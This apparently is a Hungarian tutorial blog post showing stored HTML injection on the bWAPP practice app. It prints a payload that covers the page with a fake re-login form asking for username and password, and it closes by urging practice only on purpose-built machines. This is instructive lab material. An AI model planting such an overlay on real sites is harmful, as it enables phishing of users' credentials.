Az előző postban megnéztük hogyan lehet betenni egy plusz menüpontot az oldalra javascript segítségével, ami ráaadásul megjelenésében ugyanolyan mint a többi gomb. Most az input mező helyére rakunk be egy új elemet, eltűntetve az eredetit.
Maradunk a bWAPP HTML Injection Stored Blog oldalon és az input mezőbe írjuk be az alábbi kódot:
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;">
Kerjuk jelentkezz be ujra:<br><form name="login" action="">
<table><tr><td>Felhasznalonev:</td><td><input type="text" name="username"/></td></tr><tr><td>Jelszo:</td>
<td><input type="text" name="password"/></td></tr><tr>
<td colspan=2 align=center><input type="submit" value="Belepek"/></td></tr>
</table></form>
Mit látunk? Eltűnt az eredeti input mező és helyette az általunk kreált login form fogad minket :)
Én úgy gondolom hogy a html injection és os command injection részt egész jól átnéztük, láthattuk hogy miket lehet megvalósítani ezeket a sérülékenységeket kihasználva. Próbálgassátok, de csak erre a célra létrehozott gépeken, oldalakon!